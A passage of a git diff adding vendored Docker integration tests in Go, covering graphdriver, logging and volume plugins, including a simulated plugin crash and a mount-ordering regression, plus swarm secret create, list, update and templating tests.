s.d.Cmd("inspect", "--format={{.GraphDriver.Name}}", "graphtest") - c.Assert(err, check.IsNil, check.Commentf(out)) - c.Assert(strings.TrimSpace(out), check.Equals, name) - - out, err = s.d.Cmd("diff", "graphtest") - c.Assert(err, check.IsNil, check.Commentf(out)) - c.Assert(strings.Contains(out, "A /hello"), check.Equals, true, check.Commentf("diff output: %s", out)) - - out, err = s.d.Cmd("rm", "-f", "graphtest") - c.Assert(err, check.IsNil, check.Commentf(out)) - - out, err = s.d.Cmd("info") - c.Assert(err, check.IsNil, check.Commentf(out)) - - err = s.d.Stop() - c.Assert(err, check.IsNil) - - // Don't check s.ec.exists, because the daemon no longer calls the - // Exists function. - c.Assert(s.ec[ext].activations, check.Equals, 2) - c.Assert(s.ec[ext].init, check.Equals, 2) - c.Assert(s.ec[ext].creations >= 1, check.Equals, true) - c.Assert(s.ec[ext].removals >= 1, check.Equals, true) - c.Assert(s.ec[ext].gets >= 1, check.Equals, true) - c.Assert(s.ec[ext].puts >= 1, check.Equals, true) - c.Assert(s.ec[ext].stats, check.Equals, 5) - c.Assert(s.ec[ext].cleanups, check.Equals, 2) - c.Assert(s.ec[ext].applydiff >= 1, check.Equals, true) - c.Assert(s.ec[ext].changes, check.Equals, 1) - c.Assert(s.ec[ext].diffsize, check.Equals, 0) - c.Assert(s.ec[ext].diff, check.Equals, 0) - c.Assert(s.ec[ext].metadata, check.Equals, 1) +func TestGraphdriverPluginV2(t *testing.T) { + skip.If(t, runtime.GOOS == "windows") + skip.If(t, testEnv.IsRemoteDaemon, "cannot run daemon when remote daemon") + skip.If(t, !requirement.HasHubConnectivity(t)) + skip.If(t, os.Getenv("DOCKER_ENGINE_GOARCH") != "amd64") + skip.If(t, !requirement.Overlay2Supported(testEnv.DaemonInfo.KernelVersion)) + + d := daemon.New(t, daemon.WithExperimental) + d.Start(t) + defer d.Stop(t) + + client := d.NewClientT(t) + defer client.Close() + ctx := context.Background() + + // install the plugin + plugin := "cpuguy83/docker-overlay2-graphdriver-plugin" + responseReader, err := client.PluginInstall(ctx, plugin, types.PluginInstallOptions{ + RemoteRef: plugin, + AcceptAllPermissions: true, + }) + defer responseReader.Close() + assert.NilError(t, err) + // ensure it's done by waiting for EOF on the response + _, err = io.Copy(ioutil.Discard, responseReader) + assert.NilError(t, err) + + // restart the daemon with the plugin set as the storage driver + d.Stop(t) + d.StartWithBusybox(t, "-s", plugin, "--storage-opt", "overlay2.override_kernel_check=1") + + testGraphDriver(t, client, ctx, plugin, nil) } -func (s *DockerExternalGraphdriverSuite) TestExternalGraphDriverPull(c *check.C) { - testRequires(c, Network, ExperimentalDaemon) +func testGraphDriver(t *testing.T, c client.APIClient, ctx context.Context, driverName string, afterContainerRunFn func(*testing.T)) { //nolint: golint + id := container.Run(t, ctx, c, container.WithCmd("sh", "-c", "echo hello > /hello")) - c.Assert(s.d.Start(), check.IsNil) + if afterContainerRunFn != nil { + afterContainerRunFn(t) + } + + i, err := c.ContainerInspect(ctx, id) + assert.NilError(t, err) + assert.Check(t, is.Equal(i.GraphDriver.Name, driverName)) - out, err := s.d.Cmd("pull", "busybox:latest") - c.Assert(err, check.IsNil, check.Commentf(out)) + diffs, err := c.ContainerDiff(ctx, id) + assert.NilError(t, err) + assert.Check(t, is.Contains(diffs, containertypes.ContainerChangeResponseItem{ + Kind: archive.ChangeAdd, + Path: "/hello", + }), "diffs: %v", diffs) - out, err = s.d.Cmd("run", "-d", "busybox", "top") - c.Assert(err, check.IsNil, check.Commentf(out)) + err = c.ContainerRemove(ctx, id, types.ContainerRemoveOptions{ + Force: true, + }) + assert.NilError(t, err) } diff --git a/vendor/github.com/docker/docker/integration/plugin/graphdriver/main_test.go b/vendor/github.com/docker/docker/integration/plugin/graphdriver/main_test.go new file mode 100644 index 0000000000..6b6c1a1232 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/plugin/graphdriver/main_test.go @@ -0,0 +1,36 @@ +package graphdriver // import "github.com/docker/docker/integration/plugin/graphdriver" + +import ( + "fmt" + "os" + "testing" + + "github.com/docker/docker/internal/test/environment" + "github.com/docker/docker/pkg/reexec" +) + +var ( + testEnv *environment.Execution +) + +func init() { + reexec.Init() // This is required for external graphdriver tests +} + +const dockerdBinary = "dockerd" + +func TestMain(m *testing.M) { + var err error + testEnv, err = environment.New() + if err != nil { + fmt.Println(err) + os.Exit(1) + } + err = environment.EnsureFrozenImagesLinux(testEnv) + if err != nil { + fmt.Println(err) + os.Exit(1) + } + testEnv.Print() + os.Exit(m.Run()) +} diff --git a/vendor/github.com/docker/docker/integration/plugin/logging/cmd/close_on_start/main.go b/vendor/github.com/docker/docker/integration/plugin/logging/cmd/close_on_start/main.go new file mode 100644 index 0000000000..6891d6a995 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/plugin/logging/cmd/close_on_start/main.go @@ -0,0 +1,48 @@ +package main + +import ( + "encoding/json" + "fmt" + "net" + "net/http" + "os" +) + +type start struct { + File string +} + +func main() { + l, err := net.Listen("unix", "/run/docker/plugins/plugin.sock") + if err != nil { + panic(err) + } + + mux := http.NewServeMux() + mux.HandleFunc("/LogDriver.StartLogging", func(w http.ResponseWriter, req *http.Request) { + startReq := &start{} + if err := json.NewDecoder(req.Body).Decode(startReq); err != nil { + http.Error(w, err.Error(), http.StatusBadRequest) + return + } + + f, err := os.OpenFile(startReq.File, os.O_RDONLY, 0600) + if err != nil { + http.Error(w, err.Error(), http.StatusInternalServerError) + return + } + + // Close the file immediately, this allows us to test what happens in the daemon when the plugin has closed the + // file or, for example, the plugin has crashed. + f.Close() + + w.WriteHeader(http.StatusOK) + fmt.Fprintln(w, `{}`) + }) + server := http.Server{ + Addr: l.Addr().String(), + Handler: mux, + } + + server.Serve(l) +} diff --git a/vendor/github.com/docker/docker/integration/plugin/logging/cmd/close_on_start/main_test.go b/vendor/github.com/docker/docker/integration/plugin/logging/cmd/close_on_start/main_test.go new file mode 100644 index 0000000000..06ab7d0f9a --- /dev/null +++ b/vendor/github.com/docker/docker/integration/plugin/logging/cmd/close_on_start/main_test.go @@ -0,0 +1 @@ +package main diff --git a/vendor/github.com/docker/docker/integration/plugin/logging/cmd/cmd_test.go b/vendor/github.com/docker/docker/integration/plugin/logging/cmd/cmd_test.go new file mode 100644 index 0000000000..1d619dd05e --- /dev/null +++ b/vendor/github.com/docker/docker/integration/plugin/logging/cmd/cmd_test.go @@ -0,0 +1 @@ +package cmd diff --git a/vendor/github.com/docker/docker/integration/plugin/logging/cmd/dummy/main.go b/vendor/github.com/docker/docker/integration/plugin/logging/cmd/dummy/main.go new file mode 100644 index 0000000000..f91b4f3b02 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/plugin/logging/cmd/dummy/main.go @@ -0,0 +1,19 @@ +package main + +import ( + "net" + "net/http" +) + +func main() { + l, err := net.Listen("unix", "/run/docker/plugins/plugin.sock") + if err != nil { + panic(err) + } + + server := http.Server{ + Addr: l.Addr().String(), + Handler: http.NewServeMux(), + } + server.Serve(l) +} diff --git a/vendor/github.com/docker/docker/integration/plugin/logging/cmd/dummy/main_test.go b/vendor/github.com/docker/docker/integration/plugin/logging/cmd/dummy/main_test.go new file mode 100644 index 0000000000..06ab7d0f9a --- /dev/null +++ b/vendor/github.com/docker/docker/integration/plugin/logging/cmd/dummy/main_test.go @@ -0,0 +1 @@ +package main diff --git a/vendor/github.com/docker/docker/integration/plugin/logging/helpers_test.go b/vendor/github.com/docker/docker/integration/plugin/logging/helpers_test.go new file mode 100644 index 0000000000..dbdd36b905 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/plugin/logging/helpers_test.go @@ -0,0 +1,67 @@ +package logging + +import ( + "context" + "os" + "os/exec" + "path/filepath" + "testing" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/internal/test/fixtures/plugin" + "github.com/docker/docker/pkg/locker" + "github.com/pkg/errors" +) + +var pluginBuildLock = locker.New() + +func ensurePlugin(t *testing.T, name string) string { + pluginBuildLock.Lock(name) + defer pluginBuildLock.Unlock(name) + + installPath := filepath.Join(os.Getenv("GOPATH"), "bin", name) + if _, err := os.Stat(installPath); err == nil { + return installPath + } + + goBin, err := exec.LookPath("go") + if err != nil { + t.Fatal(err) + } + + cmd := exec.Command(goBin, "build", "-o", installPath, "./"+filepath.Join("cmd", name)) + cmd.Env = append(cmd.Env, "CGO_ENABLED=0") + if out, err := cmd.CombinedOutput(); err != nil { + t.Fatal(errors.Wrapf(err, "error building basic plugin bin: %s", string(out))) + } + + return installPath +} + +func withSockPath(name string) func(*plugin.Config) { + return func(cfg *plugin.Config) { + cfg.Interface.Socket = name + } +} + +func createPlugin(t *testing.T, client plugin.CreateClient, alias, bin string, opts ...plugin.CreateOpt) { + pluginBin := ensurePlugin(t, bin) + + opts = append(opts, withSockPath("plugin.sock")) + opts = append(opts, plugin.WithBinary(pluginBin)) + + ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second) + err := plugin.Create(ctx, client, alias, opts...) + cancel() + + if err != nil { + t.Fatal(err) + } +} + +func asLogDriver(cfg *plugin.Config) { + cfg.Interface.Types = []types.PluginInterfaceType{ + {Capability: "logdriver", Prefix: "docker", Version: "1.0"}, + } +} diff --git a/vendor/github.com/docker/docker/integration/plugin/logging/logging_test.go b/vendor/github.com/docker/docker/integration/plugin/logging/logging_test.go new file mode 100644 index 0000000000..3921fa6e69 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/plugin/logging/logging_test.go @@ -0,0 +1,79 @@ +package logging + +import ( + "bufio" + "context" + "os" + "strings" + "testing" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/daemon" + "gotest.tools/assert" + "gotest.tools/skip" +) + +func TestContinueAfterPluginCrash(t *testing.T) { + skip.If(t, testEnv.IsRemoteDaemon(), "test requires daemon on the same host") + t.Parallel() + + d := daemon.New(t) + d.StartWithBusybox(t, "--iptables=false", "--init") + defer d.Stop(t) + + client := d.NewClientT(t) + createPlugin(t, client, "test", "close_on_start", asLogDriver) + + ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second) + assert.Assert(t, client.PluginEnable(ctx, "test", types.PluginEnableOptions{Timeout: 30})) + cancel() + defer client.PluginRemove(context.Background(), "test", types.PluginRemoveOptions{Force: true}) + + ctx, cancel = context.WithTimeout(context.Background(), 60*time.Second) + + id := container.Run(t, ctx, client, + container.WithAutoRemove, + container.WithLogDriver("test"), + container.WithCmd( + "/bin/sh", "-c", "while true; do sleep 1; echo hello; done", + ), + ) + cancel() + defer client.ContainerRemove(context.Background(), id, types.ContainerRemoveOptions{Force: true}) + + // Attach to the container to make sure it's written a few times to stdout + attach, err := client.ContainerAttach(context.Background(), id, types.ContainerAttachOptions{Stream: true, Stdout: true}) + assert.Assert(t, err) + + chErr := make(chan error) + go func() { + defer close(chErr) + rdr := bufio.NewReader(attach.Reader) + for i := 0; i < 5; i++ { + _, _, err := rdr.ReadLine() + if err != nil { + chErr <- err + return + } + } + }() + + select { + case err := <-chErr: + assert.Assert(t, err) + case <-time.After(60 * time.Second): + t.Fatal("timeout waiting for container i/o") + } + + // check daemon logs for "broken pipe" + // TODO(@cpuguy83): This is horribly hacky but is the only way to really test this case right now. + // It would be nice if there was a way to know that a broken pipe has occurred without looking through the logs. + log, err := os.Open(d.LogFileName()) + assert.Assert(t, err) + scanner := bufio.NewScanner(log) + for scanner.Scan() { + assert.Assert(t, !strings.Contains(scanner.Text(), "broken pipe")) + } +} diff --git a/vendor/github.com/docker/docker/integration/plugin/logging/main_test.go b/vendor/github.com/docker/docker/integration/plugin/logging/main_test.go new file mode 100644 index 0000000000..e1292a5718 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/plugin/logging/main_test.go @@ -0,0 +1,29 @@ +package logging // import "github.com/docker/docker/integration/plugin/logging" + +import ( + "fmt" + "os" + "testing" + + "github.com/docker/docker/internal/test/environment" +) + +var ( + testEnv *environment.Execution +) + +func TestMain(m *testing.M) { + var err error + testEnv, err = environment.New() + if err != nil { + fmt.Println(err) + os.Exit(1) + } + err = environment.EnsureFrozenImagesLinux(testEnv) + if err != nil { + fmt.Println(err) + os.Exit(1) + } + testEnv.Print() + os.Exit(m.Run()) +} diff --git a/vendor/github.com/docker/docker/integration/plugin/logging/validation_test.go b/vendor/github.com/docker/docker/integration/plugin/logging/validation_test.go new file mode 100644 index 0000000000..0d9b15efbf --- /dev/null +++ b/vendor/github.com/docker/docker/integration/plugin/logging/validation_test.go @@ -0,0 +1,35 @@ +package logging + +import ( + "context" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/internal/test/daemon" + "gotest.tools/assert" + "gotest.tools/skip" +) + +// Regression test for #35553 +// Ensure that a daemon with a log plugin set as the default logger for containers +// does not keep the daemon from starting. +func TestDaemonStartWithLogOpt(t *testing.T) { + skip.If(t, testEnv.IsRemoteDaemon, "cannot run daemon when remote daemon") + t.Parallel() + + d := daemon.New(t) + d.Start(t, "--iptables=false") + defer d.Stop(t) + + client, err := d.NewClient() + assert.Check(t, err) + ctx := context.Background() + + createPlugin(t, client, "test", "dummy", asLogDriver) + err = client.PluginEnable(ctx, "test", types.PluginEnableOptions{Timeout: 30}) + assert.Check(t, err) + defer client.PluginRemove(ctx, "test", types.PluginRemoveOptions{Force: true}) + + d.Stop(t) + d.Start(t, "--iptables=false", "--log-driver=test", "--log-opt=foo=bar") +} diff --git a/vendor/github.com/docker/docker/integration/plugin/pkg_test.go b/vendor/github.com/docker/docker/integration/plugin/pkg_test.go new file mode 100644 index 0000000000..b56d3e2bae --- /dev/null +++ b/vendor/github.com/docker/docker/integration/plugin/pkg_test.go @@ -0,0 +1 @@ +package plugin // import "github.com/docker/docker/integration/plugin" diff --git a/vendor/github.com/docker/docker/integration/plugin/volumes/cmd/cmd_test.go b/vendor/github.com/docker/docker/integration/plugin/volumes/cmd/cmd_test.go new file mode 100644 index 0000000000..1d619dd05e --- /dev/null +++ b/vendor/github.com/docker/docker/integration/plugin/volumes/cmd/cmd_test.go @@ -0,0 +1 @@ +package cmd diff --git a/vendor/github.com/docker/docker/integration/plugin/volumes/cmd/dummy/main.go b/vendor/github.com/docker/docker/integration/plugin/volumes/cmd/dummy/main.go new file mode 100644 index 0000000000..f91b4f3b02 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/plugin/volumes/cmd/dummy/main.go @@ -0,0 +1,19 @@ +package main + +import ( + "net" + "net/http" +) + +func main() { + l, err := net.Listen("unix", "/run/docker/plugins/plugin.sock") + if err != nil { + panic(err) + } + + server := http.Server{ + Addr: l.Addr().String(), + Handler: http.NewServeMux(), + } + server.Serve(l) +} diff --git a/vendor/github.com/docker/docker/integration/plugin/volumes/cmd/dummy/main_test.go b/vendor/github.com/docker/docker/integration/plugin/volumes/cmd/dummy/main_test.go new file mode 100644 index 0000000000..06ab7d0f9a --- /dev/null +++ b/vendor/github.com/docker/docker/integration/plugin/volumes/cmd/dummy/main_test.go @@ -0,0 +1 @@ +package main diff --git a/vendor/github.com/docker/docker/integration/plugin/volumes/helpers_test.go b/vendor/github.com/docker/docker/integration/plugin/volumes/helpers_test.go new file mode 100644 index 0000000000..36aafd59c2 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/plugin/volumes/helpers_test.go @@ -0,0 +1,73 @@ +package volumes + +import ( + "context" + "os" + "os/exec" + "path/filepath" + "testing" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/internal/test/fixtures/plugin" + "github.com/docker/docker/pkg/locker" + "github.com/pkg/errors" +) + +var pluginBuildLock = locker.New() + +// ensurePlugin makes the that a plugin binary has been installed on the system. +// Plugins that have not been installed are built from `cmd/`. +func ensurePlugin(t *testing.T, name string) string { + pluginBuildLock.Lock(name) + defer pluginBuildLock.Unlock(name) + + goPath := os.Getenv("GOPATH") + if goPath == "" { + goPath = "/go" + } + installPath := filepath.Join(goPath, "bin", name) + if _, err := os.Stat(installPath); err == nil { + return installPath + } + + goBin, err := exec.LookPath("go") + if err != nil { + t.Fatal(err) + } + + cmd := exec.Command(goBin, "build", "-o", installPath, "./"+filepath.Join("cmd", name)) + cmd.Env = append(cmd.Env, "CGO_ENABLED=0") + if out, err := cmd.CombinedOutput(); err != nil { + t.Fatal(errors.Wrapf(err, "error building basic plugin bin: %s", string(out))) + } + + return installPath +} + +func withSockPath(name string) func(*plugin.Config) { + return func(cfg *plugin.Config) { + cfg.Interface.Socket = name + } +} + +func createPlugin(t *testing.T, client plugin.CreateClient, alias, bin string, opts ...plugin.CreateOpt) { + pluginBin := ensurePlugin(t, bin) + + opts = append(opts, withSockPath("plugin.sock")) + opts = append(opts, plugin.WithBinary(pluginBin)) + + ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second) + err := plugin.Create(ctx, client, alias, opts...) + cancel() + + if err != nil { + t.Fatal(err) + } +} + +func asVolumeDriver(cfg *plugin.Config) { + cfg.Interface.Types = []types.PluginInterfaceType{ + {Capability: "volumedriver", Prefix: "docker", Version: "1.0"}, + } +} diff --git a/vendor/github.com/docker/docker/integration/plugin/volumes/main_test.go b/vendor/github.com/docker/docker/integration/plugin/volumes/main_test.go new file mode 100644 index 0000000000..5a5678d9c4 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/plugin/volumes/main_test.go @@ -0,0 +1,32 @@ +package volumes // import "github.com/docker/docker/integration/plugin/volumes" + +import ( + "fmt" + "os" + "testing" + + "github.com/docker/docker/internal/test/environment" +) + +var ( + testEnv *environment.Execution +) + +func TestMain(m *testing.M) { + var err error + testEnv, err = environment.New() + if err != nil { + fmt.Println(err) + os.Exit(1) + } + if testEnv.OSType != "linux" { + os.Exit(0) + } + err = environment.EnsureFrozenImagesLinux(testEnv) + if err != nil { + fmt.Println(err) + os.Exit(1) + } + testEnv.Print() + os.Exit(m.Run()) +} diff --git a/vendor/github.com/docker/docker/integration/plugin/volumes/mounts_test.go b/vendor/github.com/docker/docker/integration/plugin/volumes/mounts_test.go new file mode 100644 index 0000000000..4b422ee5c3 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/plugin/volumes/mounts_test.go @@ -0,0 +1,58 @@ +package volumes + +import ( + "context" + "io/ioutil" + "os" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/internal/test/daemon" + "github.com/docker/docker/internal/test/fixtures/plugin" + "gotest.tools/assert" + "gotest.tools/skip" +) + +// TestPluginWithDevMounts tests very specific regression caused by mounts ordering +// (sorted in the daemon). See #36698 +func TestPluginWithDevMounts(t *testing.T) { + skip.If(t, testEnv.IsRemoteDaemon, "cannot run daemon when remote daemon") + t.Parallel() + + d := daemon.New(t) + d.Start(t, "--iptables=false") + defer d.Stop(t) + + client, err := d.NewClient() + assert.Assert(t, err) + ctx := context.Background() + + testDir, err := ioutil.TempDir("", "test-dir") + assert.Assert(t, err) + defer os.RemoveAll(testDir) + + createPlugin(t, client, "test", "dummy", asVolumeDriver, func(c *plugin.Config) { + root := "/" + dev := "/dev" + mounts := []types.PluginMount{ + {Type: "bind", Source: &root, Destination: "/host", Options: []string{"rbind"}}, + {Type: "bind", Source: &dev, Destination: "/dev", Options: []string{"rbind"}}, + {Type: "bind", Source: &testDir, Destination: "/etc/foo", Options: []string{"rbind"}}, + } + c.PluginConfig.Mounts = append(c.PluginConfig.Mounts, mounts...) + c.PropagatedMount = "/propagated" + c.Network = types.PluginConfigNetwork{Type: "host"} + c.IpcHost = true + }) + + err = client.PluginEnable(ctx, "test", types.PluginEnableOptions{Timeout: 30}) + assert.Assert(t, err) + defer func() { + err := client.PluginRemove(ctx, "test", types.PluginRemoveOptions{Force: true}) + assert.Check(t, err) + }() + + p, _, err := client.PluginInspectWithRaw(ctx, "test") + assert.Assert(t, err) + assert.Assert(t, p.Enabled) +} diff --git a/vendor/github.com/docker/docker/integration/secret/main_test.go b/vendor/github.com/docker/docker/integration/secret/main_test.go new file mode 100644 index 0000000000..abd4eef9f0 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/secret/main_test.go @@ -0,0 +1,33 @@ +package secret // import "github.com/docker/docker/integration/secret" + +import ( + "fmt" + "os" + "testing" + + "github.com/docker/docker/internal/test/environment" +) + +var testEnv *environment.Execution + +func TestMain(m *testing.M) { + var err error + testEnv, err = environment.New() + if err != nil { + fmt.Println(err) + os.Exit(1) + } + err = environment.EnsureFrozenImagesLinux(testEnv) + if err != nil { + fmt.Println(err) + os.Exit(1) + } + + testEnv.Print() + os.Exit(m.Run()) +} + +func setupTest(t *testing.T) func() { + environment.ProtectAll(t, testEnv) + return func() { testEnv.Clean(t) } +} diff --git a/vendor/github.com/docker/docker/integration/secret/secret_test.go b/vendor/github.com/docker/docker/integration/secret/secret_test.go new file mode 100644 index 0000000000..ecc3108f65 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/secret/secret_test.go @@ -0,0 +1,366 @@ +package secret // import "github.com/docker/docker/integration/secret" + +import ( + "bytes" + "context" + "sort" + "testing" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + swarmtypes "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/client" + "github.com/docker/docker/integration/internal/swarm" + "github.com/docker/docker/pkg/stdcopy" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/skip" +) + +func TestSecretInspect(t *testing.T) { + skip.If(t, testEnv.DaemonInfo.OSType != "linux") + + defer setupTest(t)() + d := swarm.NewSwarm(t, testEnv) + defer d.Stop(t) + client := d.NewClientT(t) + defer client.Close() + + ctx := context.Background() + + testName := "test_secret_" + t.Name() + secretID := createSecret(ctx, t, client, testName, []byte("TESTINGDATA"), nil) + + secret, _, err := client.SecretInspectWithRaw(context.Background(), secretID) + assert.NilError(t, err) + assert.Check(t, is.Equal(secret.Spec.Name, testName)) + + secret, _, err = client.SecretInspectWithRaw(context.Background(), testName) + assert.NilError(t, err) + assert.Check(t, is.Equal(secretID, secretID)) +} + +func TestSecretList(t *testing.T) { + skip.If(t, testEnv.DaemonInfo.OSType != "linux") + + defer setupTest(t)() + d := swarm.NewSwarm(t, testEnv) + defer d.Stop(t) + client := d.NewClientT(t) + defer client.Close() + ctx := context.Background() + + testName0 := "test0_" + t.Name() + testName1 := "test1_" + t.Name() + testNames := []string{testName0, testName1} + sort.Strings(testNames) + + // create secret test0 + createSecret(ctx, t, client, testName0, []byte("TESTINGDATA0"), map[string]string{"type": "test"}) + + // create secret test1 + secret1ID := createSecret(ctx, t, client, testName1, []byte("TESTINGDATA1"), map[string]string{"type": "production"}) + + names := func(entries []swarmtypes.Secret) []string { + var values []string + for _, entry := range entries { + values = append(values, entry.Spec.Name) + } + sort.Strings(values) + return values + } + + // test by `secret ls` + entries, err := client.SecretList(ctx, types.SecretListOptions{}) + assert.NilError(t, err) + assert.Check(t, is.DeepEqual(names(entries), testNames)) + + testCases := []struct { + filters filters.Args + expected []string + }{ + // test filter by name `secret ls --filter name=xxx` + { + filters: filters.NewArgs(filters.Arg("name", testName0)), + expected: []string{testName0}, + }, + // test filter by id `secret ls --filter id=xxx` + { + filters: filters.NewArgs(filters.Arg("id", secret1ID)), + expected: []string{testName1}, + }, + // test filter by label `secret ls --filter label=xxx` + { + filters: filters.NewArgs(filters.Arg("label", "type")), + expected: testNames, + }, + { + filters: filters.NewArgs(filters.Arg("label", "type=test")), + expected: []string{testName0}, + }, + { + filters: filters.NewArgs(filters.Arg("label", "type=production")), + expected: []string{testName1}, + }, + } + for _, tc := range testCases { + entries, err = client.SecretList(ctx, types.SecretListOptions{ + Filters: tc.filters, + }) + assert.NilError(t, err) + assert.Check(t, is.DeepEqual(names(entries), tc.expected)) + + } +} + +func createSecret(ctx context.Context, t *testing.T, client client.APIClient, name string, data []byte, labels map[string]string) string { + secret, err := client.SecretCreate(ctx, swarmtypes.SecretSpec{ + Annotations: swarmtypes.Annotations{ + Name: name, + Labels: labels, + }, + Data: data, + }) + assert.NilError(t, err) + assert.Check(t, secret.ID != "") + return secret.ID +} + +func TestSecretsCreateAndDelete(t *testing.T) { + skip.If(t, testEnv.DaemonInfo.OSType != "linux") + + defer setupTest(t)() + d := swarm.NewSwarm(t, testEnv) + defer d.Stop(t) + client := d.NewClientT(t) + defer client.Close() + ctx := context.Background() + + testName := "test_secret_" + t.Name() + secretID := createSecret(ctx, t, client, testName, []byte("TESTINGDATA"), nil) + + // create an already existin secret, daemon should return a status code of 409 + _, err := client.SecretCreate(ctx, swarmtypes.SecretSpec{ + Annotations: swarmtypes.Annotations{ + Name: testName, + }, + Data: []byte("TESTINGDATA"), + }) + assert.Check(t, is.ErrorContains(err, "already exists")) + + // Ported from original TestSecretsDelete + err = client.SecretRemove(ctx, secretID) + assert.NilError(t, err) + + _, _, err = client.SecretInspectWithRaw(ctx, secretID) + assert.Check(t, is.ErrorContains(err, "No such secret")) + + err = client.SecretRemove(ctx, "non-existin") + assert.Check(t, is.ErrorContains(err, "No such secret: non-existin")) + + // Ported from original TestSecretsCreteaWithLabels + testName = "test_secret_with_labels_" + t.Name() + secretID = createSecret(ctx, t, client, testName, []byte("TESTINGDATA"), map[string]string{ + "key1": "value1", + "key2": "value2", + }) + + insp, _, err := client.SecretInspectWithRaw(ctx, secretID) + assert.NilError(t, err) + assert.Check(t, is.Equal(insp.Spec.Name, testName)) + assert.Check(t, is.Equal(len(insp.Spec.Labels), 2)) + assert.Check(t, is.Equal(insp.Spec.Labels["key1"], "value1")) + assert.Check(t, is.Equal(insp.Spec.Labels["key2"], "value2")) +} + +func TestSecretsUpdate(t *testing.T) { + skip.If(t, testEnv.DaemonInfo.OSType != "linux") + + defer setupTest(t)() + d := swarm.NewSwarm(t, testEnv) + defer d.Stop(t) + client := d.NewClientT(t) + defer client.Close() + ctx := context.Background() + + testName := "test_secret_" + t.Name() + secretID := createSecret(ctx, t, client, testName, []byte("TESTINGDATA"), nil) + + insp, _, err := client.SecretInspectWithRaw(ctx, secretID) + assert.NilError(t, err) + assert.Check(t, is.Equal(insp.ID, secretID)) + + // test UpdateSecret with full ID + insp.Spec.Labels = map[string]string{"test": "test1"} + err = client.SecretUpdate(ctx, secretID, insp.Version, insp.Spec) + assert.NilError(t, err) + + insp, _, err = client.SecretInspectWithRaw(ctx, secretID) + assert.NilError(t, err) + assert.Check(t, is.Equal(insp.Spec.Labels["test"], "test1")) + + // test UpdateSecret with full name + insp.Spec.Labels = map[string]string{"test": "test2"} + err = client.SecretUpdate(ctx, testName, insp.Version, insp.Spec) + assert.NilError(t, err) + + insp, _, err = client.SecretInspectWithRaw(ctx, secretID) + assert.NilError(t, err) + assert.Check(t, is.Equal(insp.Spec.Labels["test"], "test2")) + + // test UpdateSecret with prefix ID + insp.Spec.Labels = map[string]string{"test": "test3"} + err = client.SecretUpdate(ctx, secretID[:1], insp.Version, insp.Spec) + assert.NilError(t, err) + + insp, _, err = client.SecretInspectWithRaw(ctx, secretID) + assert.NilError(t, err) + assert.Check(t, is.Equal(insp.Spec.Labels["test"], "test3")) + + // test UpdateSecret in updating Data which is not supported in daemon + // this test will produce an error in func UpdateSecret + insp.Spec.Data = []byte("TESTINGDATA2") + err = client.SecretUpdate(ctx, secretID, insp.Version, insp.Spec) + assert.Check(t, is.ErrorContains(err, "only updates to Labels are allowed")) +} + +func TestTemplatedSecret(t *testing.T) { + d := swarm.NewSwarm(t, testEnv) + defer d.Stop(t) + client := d.NewClientT(t) + defer client.Close() + ctx := context.Background() + + referencedSecretName := "referencedsecret_" + t.Name() + referencedSecretSpec := swarmtypes.SecretSpec{ + Annotations: swarmtypes.Annotations{ + Name: referencedSecretName, + }, + Data: []byte("this is a secret"), + } + referencedSecret, err := client.SecretCreate(ctx, referencedSecretSpec) + assert.Check(t, err) + + referencedConfigName := "referencedconfig_" + t.Name() + referencedConfigSpec := swarmtypes.ConfigSpec{ + Annotations: swarmtypes.Annotations{ + Name: referencedConfigName, + }, + Data: []byte("this is a config"), + } + referencedConfig, err := client.ConfigCreate(ctx, referencedConfigSpec) + assert.Check(t, err) + + templatedSecretName := "templated_secret_" + t.Name() + secretSpec := swarmtypes.SecretSpec{ + Annotations: swarmtypes.Annotations{ + Name: templatedSecretName, + }, + Templating: &swarmtypes.Driver{ + Name: "golang", + }, + Data: []byte("SERVICE_NAME={{.Service.Name}}\n" + + "{{secret \"referencedsecrettarget\"}}\n" + + "{{config \"referencedconfigtarget\"}}\n"), + } + + templatedSecret, err := client.SecretCreate(ctx, secretSpec) + assert.Check(t, err) + + serviceName := "svc_" + t.Name() + serviceID := swarm.CreateService(t, d, + swarm.ServiceWithSecret( + &swarmtypes.SecretReference{ + File: &swarmtypes.SecretReferenceFileTarget{ + Name: "templated_secret", + UID: "0", + GID: "0", + Mode: 0600, + }, + SecretID: templatedSecret.ID, + SecretName: templatedSecretName, + }, + ), + swarm.ServiceWithConfig( + &swarmtypes.ConfigReference{ + File: &swarmtypes.ConfigReferenceFileTarget{ + Name: "referencedconfigtarget", + UID: "0", + GID: "0", + Mode: 0600, + }, + ConfigID: referencedConfig.ID, + ConfigName: referencedConfigName, + }, + ), + swarm.ServiceWithSecret( + &swarmtypes.SecretReference{ + File: &swarmtypes.SecretReferenceFileTarget{ + Name: "referencedsecrettarget", + UID: "0", + GID: "0", + Mode: 0600, + }, + SecretID: referencedSecret.ID, + SecretName: referencedSecretName, + }, + ), + swarm.ServiceWithName(serviceName), + ) + + var tasks []swarmtypes.Task + waitAndAssert(t, 60*time.Second, func(t *testing.T) bool { + tasks = swarm.GetRunningTasks(t, d, serviceID) + return len(tasks) > 0 + }) + + task := tasks[0] + waitAndAssert(t, 60*time.Second, func(t *testing.T) bool { + if task.NodeID == "" || (task.Status.ContainerStatus == nil || task.Status.ContainerStatus.ContainerID == "") { + task, _, _ = 